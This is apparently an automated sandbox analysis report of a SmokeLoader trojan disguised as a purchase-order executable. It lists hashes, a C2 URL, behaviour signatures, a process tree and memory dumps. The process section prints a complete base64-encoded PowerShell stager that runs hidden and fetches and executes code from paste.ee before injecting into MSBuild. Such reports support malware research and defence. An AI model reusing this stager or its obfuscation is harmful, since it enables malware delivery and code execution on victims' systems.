Analysis

  • max time kernel
    68s
  • max time network
    119s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    14-08-2020 08:27

General

  • Target

    Purchase Order 21PTAES2110-2.pif.exe

  • Size

    173KB

  • MD5

    12f34f9b5d3817801893ee1aad6a5ef3

  • SHA1

    d0e8e93451aaea3571419169e5fd73a5f2a31cc2

  • SHA256

    966c1a5412af27dde07c13cbb17b743eec085d16aeac60849af71d376d1452ac

  • SHA512

    5fd48762f0c164f3a38530cf98655d3151ccac4c3d7abad4e02285bb8946817356b10d1e30c052d6f0012a85ed8257f413aaff3397877d3dc36b9bb7f8a2d606

Malware Config

Extracted

Family

smokeloader

Version

2018

C2

http://5by80.com/1/

rc4.i32
rc4.i32

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Blacklisted process makes network request 1 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Purchase Order 21PTAES2110-2.pif.exe
    "C:\Users\Admin\AppData\Local\Temp\Purchase Order 21PTAES2110-2.pif.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1536
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AVwBhAHkAdQBXACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAKgAiACwAIAAiADQAOAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAjACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBZAFQAaQBGAFIAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAQwAuAE0AXQA6ADoAUgAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA=
      2⤵
      • Blacklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3436
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        3⤵
        • Maps connected drives based on registry
        • Suspicious behavior: MapViewOfSection
        PID:2596

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1536-15-0x00000000070D0000-0x00000000070D1000-memory.dmp

    Filesize

    4KB

  • memory/1536-5-0x0000000006550000-0x0000000006551000-memory.dmp

    Filesize

    4KB

  • memory/1536-0-0x0000000073410000-0x0000000073AFE000-memory.dmp

    Filesize

    6.9MB

  • memory/1536-4-0x0000000005540000-0x0000000005541000-memory.dmp

    Filesize

    4KB

  • memory/1536-16-0x0000000007170000-0x0000000007171000-memory.dmp

    Filesize

    4KB

  • memory/1536-6-0x0000000006030000-0x0000000006031000-memory.dmp

    Filesize

    4KB

  • memory/1536-7-0x0000000006090000-0x0000000006091000-memory.dmp

    Filesize

    4KB

  • memory/1536-8-0x0000000007200000-0x0000000007201000-memory.dmp

    Filesize

    4KB

  • memory/1536-9-0x0000000006170000-0x0000000006171000-memory.dmp

    Filesize

    4KB

  • memory/1536-10-0x0000000006110000-0x0000000006111000-memory.dmp

    Filesize

    4KB

  • memory/1536-11-0x0000000006280000-0x0000000006281000-memory.dmp

    Filesize

    4KB

  • memory/1536-17-0x0000000007950000-0x0000000007951000-memory.dmp

    Filesize

    4KB

  • memory/1536-13-0x00000000062F0000-0x00000000062F1000-memory.dmp

    Filesize

    4KB

  • memory/1536-14-0x0000000006CD0000-0x0000000006CD1000-memory.dmp

    Filesize

    4KB

  • memory/1536-3-0x0000000004E10000-0x0000000004E11000-memory.dmp

    Filesize

    4KB

  • memory/1536-1-0x0000000000530000-0x0000000000531000-memory.dmp

    Filesize

    4KB

  • memory/1536-12-0x0000000006210000-0x0000000006211000-memory.dmp

    Filesize

    4KB

  • memory/1536-18-0x0000000007AB0000-0x0000000007AB1000-memory.dmp

    Filesize

    4KB

  • memory/1536-44-0x0000000009450000-0x0000000009451000-memory.dmp

    Filesize

    4KB

  • memory/1536-42-0x0000000009700000-0x0000000009701000-memory.dmp

    Filesize

    4KB

  • memory/1536-41-0x00000000092E0000-0x00000000092E1000-memory.dmp

    Filesize

    4KB

  • memory/1536-40-0x00000000092B0000-0x00000000092B1000-memory.dmp

    Filesize

    4KB

  • memory/2596-36-0x0000000001010000-0x0000000001025000-memory.dmp

    Filesize

    84KB

  • memory/2596-34-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

  • memory/3028-38-0x0000000000FB0000-0x0000000000FB1000-memory.dmp

    Filesize

    4KB

  • memory/3436-33-0x0000000004C30000-0x0000000004C3A000-memory.dmp

    Filesize

    40KB

  • memory/3436-20-0x0000000073410000-0x0000000073AFE000-memory.dmp

    Filesize

    6.9MB